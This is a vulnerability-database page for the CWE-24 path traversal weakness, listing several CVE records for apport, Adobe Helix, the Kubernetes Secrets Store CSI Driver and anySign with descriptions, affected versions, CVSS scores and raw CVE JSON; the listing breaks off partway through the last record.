Common Weakness Enumeration

CWE-24

Allowed

Path Traversal: '../filedir'

Abstraction: Variant · Status: Incomplete

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "../" sequences that can resolve to a location that is outside of that directory.

187 vulnerabilities reference this CWE, most recent first.

CVE-2021-3710 (GCVE-0-2021-3710)

Vulnerability from cvelistv5 – Published: 2021-10-01 02:35 – Updated: 2024-09-17 01:41
VLAI
Title
Apport info disclosure via path traversal bug in read_file
Summary
An information disclosure via path traversal was discovered in apport/hookutils.py function read_file(). This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3;
CWE
  • CWE-24 - Path Traversal: '../filedir'
Assigner
Impacted products
Vendor Product Version
Canonical apport Affected: 2.14.1 , < 2.14.1-0ubuntu3.29+esm8 (custom)
Affected: 2.20.1 , < 2.20.1-0ubuntu2.30+esm2 (custom)
Affected: 2.20.9 , < 2.20.9-0ubuntu7.26 (custom)
Affected: 2.20.11 , < 2.20.11-0ubuntu27.20 (custom)
Create a notification for this product.
Date Public
2021-09-14 00:00
Credits
Stephen Röttger (@_tsuro) Maik Münch (maik@secfault-security.com)(@fktio)
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T17:01:08.314Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://ubuntu.com/security/notices/USN-5077-1"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://ubuntu.com/security/notices/USN-5077-2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3710"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "apport",
          "vendor": "Canonical",
          "versions": [
            {
              "lessThan": "2.14.1-0ubuntu3.29+esm8",
              "status": "affected",
              "version": "2.14.1",
              "versionType": "custom"
            },
            {
              "lessThan": "2.20.1-0ubuntu2.30+esm2",
              "status": "affected",
              "version": "2.20.1",
              "versionType": "custom"
            },
            {
              "lessThan": "2.20.9-0ubuntu7.26",
              "status": "affected",
              "version": "2.20.9",
              "versionType": "custom"
            },
            {
              "changes": [
                {
                  "at": "2.20.11-0ubuntu65.3",
                  "status": "unaffected"
                }
              ],
              "lessThan": "2.20.11-0ubuntu27.20",
              "status": "affected",
              "version": "2.20.11",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Stephen R\u00f6ttger (@_tsuro)"
        },
        {
          "lang": "en",
          "value": "Maik M\u00fcnch (maik@secfault-security.com)(@fktio)"
        }
      ],
      "datePublic": "2021-09-14T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "An information disclosure via path traversal was discovered in apport/hookutils.py function read_file(). This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3;"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-10-01T02:35:22.000Z",
        "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
        "shortName": "canonical"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://ubuntu.com/security/notices/USN-5077-1"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://ubuntu.com/security/notices/USN-5077-2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3710"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832"
        }
      ],
      "source": {
        "advisory": "https://ubuntu.com/security/notices/USN-5077-1",
        "defect": [
          "https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832"
        ],
        "discovery": "EXTERNAL"
      },
      "title": "Apport info disclosure via path traversal bug in read_file",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@ubuntu.com",
          "DATE_PUBLIC": "2021-09-14T00:00:00.000Z",
          "ID": "CVE-2021-3710",
          "STATE": "PUBLIC",
          "TITLE": "Apport info disclosure via path traversal bug in read_file"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "apport",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_name": "2.14.1",
                            "version_value": "2.14.1-0ubuntu3.29+esm8"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "2.20.1",
                            "version_value": "2.20.1-0ubuntu2.30+esm2"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "2.20.9",
                            "version_value": "2.20.9-0ubuntu7.26"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "2.20.11",
                            "version_value": "2.20.11-0ubuntu27.20"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "2.20.11",
                            "version_value": "2.20.11-0ubuntu65.3"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Canonical"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Stephen R\u00f6ttger (@_tsuro)"
          },
          {
            "lang": "eng",
            "value": "Maik M\u00fcnch (maik@secfault-security.com)(@fktio)"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An information disclosure via path traversal was discovered in apport/hookutils.py function read_file(). This issue affects: apport 2.14.1 versions prior to 2.14.1-0ubuntu3.29+esm8; 2.20.1 versions prior to 2.20.1-0ubuntu2.30+esm2; 2.20.9 versions prior to 2.20.9-0ubuntu7.26; 2.20.11 versions prior to 2.20.11-0ubuntu27.20; 2.20.11 versions prior to 2.20.11-0ubuntu65.3;"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-24 Path Traversal: \u0027../filedir\u0027"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://ubuntu.com/security/notices/USN-5077-1",
              "refsource": "MISC",
              "url": "https://ubuntu.com/security/notices/USN-5077-1"
            },
            {
              "name": "https://ubuntu.com/security/notices/USN-5077-2",
              "refsource": "MISC",
              "url": "https://ubuntu.com/security/notices/USN-5077-2"
            },
            {
              "name": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3710",
              "refsource": "MISC",
              "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3710"
            },
            {
              "name": "https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832",
              "refsource": "MISC",
              "url": "https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832"
            }
          ]
        },
        "source": {
          "advisory": "https://ubuntu.com/security/notices/USN-5077-1",
          "defect": [
            "https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1933832"
          ],
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
    "assignerShortName": "canonical",
    "cveId": "CVE-2021-3710",
    "datePublished": "2021-10-01T02:35:22.911Z",
    "dateReserved": "2021-08-16T00:00:00.000Z",
    "dateUpdated": "2024-09-17T01:41:25.529Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-9708 (GCVE-0-2020-9708)

Vulnerability from cvelistv5 – Published: 2020-08-14 16:48 – Updated: 2024-09-16 16:43
VLAI
Title
GHSL-2020-133: Insufficient validation of user input in resolveRepositoryPath function
Summary
The resolveRepositoryPath function doesn't properly validate user input and a malicious user may traverse to any valid Git repository outside the repoRoot. This issue may lead to unauthorized access of private Git repositories as long as the malicious user knows or brute-forces the location of the repository.
CWE
  • CWE-24 - Path Traversal: '../filedir'
Assigner
References
Impacted products
Vendor Product Version
Adobe Helix Affected: unspecified , < 1.3.1 (custom)
Create a notification for this product.
Date Public
2020-08-10 00:00
Credits
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T10:34:39.923Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/adobe/git-server/security/advisories/GHSA-cgj4-x2hh-2x93"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Helix",
          "vendor": "Adobe",
          "versions": [
            {
              "lessThan": "1.3.1",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Loba\u010devski)."
        }
      ],
      "datePublic": "2020-08-10T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "The resolveRepositoryPath function doesn\u0027t properly validate user input and a malicious user may traverse to any valid Git repository outside the repoRoot. This issue may lead to unauthorized access of private Git repositories as long as the malicious user knows or brute-forces the location of the repository."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-08-14T16:48:30.000Z",
        "orgId": "078d4453-3bcd-4900-85e6-15281da43538",
        "shortName": "adobe"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/adobe/git-server/security/advisories/GHSA-cgj4-x2hh-2x93"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "GHSL-2020-133: Insufficient validation of user input in resolveRepositoryPath function",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@adobe.com",
          "DATE_PUBLIC": "2020-08-10T23:00:00.000Z",
          "ID": "CVE-2020-9708",
          "STATE": "PUBLIC",
          "TITLE": "GHSL-2020-133: Insufficient validation of user input in resolveRepositoryPath function"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Helix",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "1.3.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Adobe"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Loba\u010devski)."
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The resolveRepositoryPath function doesn\u0027t properly validate user input and a malicious user may traverse to any valid Git repository outside the repoRoot. This issue may lead to unauthorized access of private Git repositories as long as the malicious user knows or brute-forces the location of the repository."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-24 Path Traversal: \u0027../filedir\u0027"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/adobe/git-server/security/advisories/GHSA-cgj4-x2hh-2x93",
              "refsource": "MISC",
              "url": "https://github.com/adobe/git-server/security/advisories/GHSA-cgj4-x2hh-2x93"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "078d4453-3bcd-4900-85e6-15281da43538",
    "assignerShortName": "adobe",
    "cveId": "CVE-2020-9708",
    "datePublished": "2020-08-14T16:48:30.769Z",
    "dateReserved": "2020-03-02T00:00:00.000Z",
    "dateUpdated": "2024-09-16T16:43:25.441Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-8568 (GCVE-0-2020-8568)

Vulnerability from cvelistv5 – Published: 2021-01-21 17:09 – Updated: 2024-09-17 03:28
VLAI
Title
Kubernetes Secrets Store CSI Driver sync/rotate directory traversal
Summary
Kubernetes Secrets Store CSI Driver versions v0.0.15 and v0.0.16 allow an attacker who can modify a SecretProviderClassPodStatus/Status resource the ability to write content to the host filesystem and sync file contents to Kubernetes Secrets. This includes paths under var/lib/kubelet/pods that contain other Kubernetes Secrets.
CWE
  • CWE-24 - Path Traversal: '../filedir'
  • CWE-20 - Improper Input Validation
Assigner
References
Impacted products
Vendor Product Version
Kubernetes Kubernetes Secrets Store CSI Driver Affected: Kubernetes Secrets Store CSI Driver v0.0.15
Affected: Kubernetes Secrets Store CSI Driver v0.0.16
Create a notification for this product.
Date Public
2020-11-10 00:00
Credits
Tommy Murphy of Google
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T10:03:46.239Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/Cb9cvymTzl4"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kubernetes Secrets Store CSI Driver",
          "vendor": "Kubernetes",
          "versions": [
            {
              "status": "affected",
              "version": "Kubernetes Secrets Store CSI Driver v0.0.15"
            },
            {
              "status": "affected",
              "version": "Kubernetes Secrets Store CSI Driver v0.0.16"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Tommy Murphy of Google"
        }
      ],
      "datePublic": "2020-11-10T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Kubernetes Secrets Store CSI Driver versions v0.0.15 and v0.0.16 allow an attacker who can modify a SecretProviderClassPodStatus/Status resource the ability to write content to the host filesystem and sync file contents to Kubernetes Secrets. This includes paths under var/lib/kubelet/pods that contain other Kubernetes Secrets."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20 Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-01-21T17:09:21.000Z",
        "orgId": "a6081bf6-c852-4425-ad4f-a67919267565",
        "shortName": "kubernetes"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/Cb9cvymTzl4"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378"
        }
      ],
      "source": {
        "defect": [
          "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378"
        ],
        "discovery": "INTERNAL"
      },
      "title": "Kubernetes Secrets Store CSI Driver sync/rotate directory traversal",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@kubernetes.io",
          "DATE_PUBLIC": "2020-11-10T21:00:00.000Z",
          "ID": "CVE-2020-8568",
          "STATE": "PUBLIC",
          "TITLE": "Kubernetes Secrets Store CSI Driver sync/rotate directory traversal"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kubernetes Secrets Store CSI Driver",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "=",
                            "version_name": "Kubernetes Secrets Store CSI Driver",
                            "version_value": "v0.0.15"
                          },
                          {
                            "version_affected": "=",
                            "version_name": "Kubernetes Secrets Store CSI Driver",
                            "version_value": "v0.0.16"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Kubernetes"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Tommy Murphy of Google"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Kubernetes Secrets Store CSI Driver versions v0.0.15 and v0.0.16 allow an attacker who can modify a SecretProviderClassPodStatus/Status resource the ability to write content to the host filesystem and sync file contents to Kubernetes Secrets. This includes paths under var/lib/kubelet/pods that contain other Kubernetes Secrets."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-24 Path Traversal: \u0027../filedir\u0027"
                }
              ]
            },
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-20 Improper Input Validation"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/Cb9cvymTzl4",
              "refsource": "MISC",
              "url": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/Cb9cvymTzl4"
            },
            {
              "name": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378",
              "refsource": "MISC",
              "url": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378"
            }
          ]
        },
        "source": {
          "defect": [
            "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/378"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a6081bf6-c852-4425-ad4f-a67919267565",
    "assignerShortName": "kubernetes",
    "cveId": "CVE-2020-8568",
    "datePublished": "2021-01-21T17:09:21.450Z",
    "dateReserved": "2020-02-03T00:00:00.000Z",
    "dateUpdated": "2024-09-17T03:28:40.493Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-8567 (GCVE-0-2020-8567)

Vulnerability from cvelistv5 – Published: 2021-01-21 17:09 – Updated: 2024-09-16 18:23
VLAI
Title
Kubernetes Secrets Store CSI Driver plugin directory traversals
Summary
Kubernetes Secrets Store CSI Driver Vault Plugin prior to v0.0.6, Azure Plugin prior to v0.0.10, and GCP Plugin prior to v0.2.0 allow an attacker who can create specially-crafted SecretProviderClass objects to write to arbitrary file paths on the host filesystem, including /var/lib/kubelet/pods.
CWE
  • CWE-24 - Path Traversal: '../filedir'
Assigner
References
Impacted products
Vendor Product Version
Kubernetes Kubernetes Secrets Store CSI Driver Affected: Vault Plugin , < v0.0.6 (custom)
Affected: Azure Plugin , < v0.0.10 (custom)
Affected: GCP Plugin , < v0.2.0 (custom)
Create a notification for this product.
Date Public
2020-11-16 00:00
Credits
Tommy Murphy of Google
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T10:03:46.223Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/BI2qisiNXHY"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kubernetes Secrets Store CSI Driver",
          "vendor": "Kubernetes",
          "versions": [
            {
              "lessThan": "v0.0.6",
              "status": "affected",
              "version": "Vault Plugin",
              "versionType": "custom"
            },
            {
              "lessThan": "v0.0.10",
              "status": "affected",
              "version": "Azure Plugin",
              "versionType": "custom"
            },
            {
              "lessThan": "v0.2.0",
              "status": "affected",
              "version": "GCP Plugin",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Tommy Murphy of Google"
        }
      ],
      "datePublic": "2020-11-16T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Kubernetes Secrets Store CSI Driver Vault Plugin prior to v0.0.6, Azure Plugin prior to v0.0.10, and GCP Plugin prior to v0.2.0 allow an attacker who can create specially-crafted SecretProviderClass objects to write to arbitrary file paths on the host filesystem, including /var/lib/kubelet/pods."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-01-21T17:09:21.000Z",
        "orgId": "a6081bf6-c852-4425-ad4f-a67919267565",
        "shortName": "kubernetes"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/BI2qisiNXHY"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384"
        }
      ],
      "source": {
        "defect": [
          "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384"
        ],
        "discovery": "INTERNAL"
      },
      "title": "Kubernetes Secrets Store CSI Driver plugin directory traversals",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@kubernetes.io",
          "DATE_PUBLIC": "2020-11-16T21:00:00.000Z",
          "ID": "CVE-2020-8567",
          "STATE": "PUBLIC",
          "TITLE": "Kubernetes Secrets Store CSI Driver plugin directory traversals"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Kubernetes Secrets Store CSI Driver",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_name": "Vault Plugin",
                            "version_value": "v0.0.6"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "Azure Plugin",
                            "version_value": "v0.0.10"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "GCP Plugin",
                            "version_value": "v0.2.0"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Kubernetes"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Tommy Murphy of Google"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Kubernetes Secrets Store CSI Driver Vault Plugin prior to v0.0.6, Azure Plugin prior to v0.0.10, and GCP Plugin prior to v0.2.0 allow an attacker who can create specially-crafted SecretProviderClass objects to write to arbitrary file paths on the host filesystem, including /var/lib/kubelet/pods."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:L",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-24 Path Traversal: \u0027../filedir\u0027"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/BI2qisiNXHY",
              "refsource": "MISC",
              "url": "https://groups.google.com/g/kubernetes-secrets-store-csi-driver/c/BI2qisiNXHY"
            },
            {
              "name": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384",
              "refsource": "MISC",
              "url": "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384"
            }
          ]
        },
        "source": {
          "defect": [
            "https://github.com/kubernetes-sigs/secrets-store-csi-driver/issues/384"
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a6081bf6-c852-4425-ad4f-a67919267565",
    "assignerShortName": "kubernetes",
    "cveId": "CVE-2020-8567",
    "datePublished": "2021-01-21T17:09:21.322Z",
    "dateReserved": "2020-02-03T00:00:00.000Z",
    "dateUpdated": "2024-09-16T18:23:40.732Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-7882 (GCVE-0-2020-7882)

Vulnerability from cvelistv5 – Published: 2021-11-22 14:43 – Updated: 2024-08-04 09:48
VLAI
Title
anySign directory traversal vulnerability
Summary
Using the parameter of getPFXFolderList function, attackers can see the information of authorization certification and delete the files. It occurs because the parameter contains path traversal characters(ie. '../../../')
CWE
  • CWE-24 - Path Traversal: '../filedir'
Assigner
References
Impacted products
Vendor Product Version
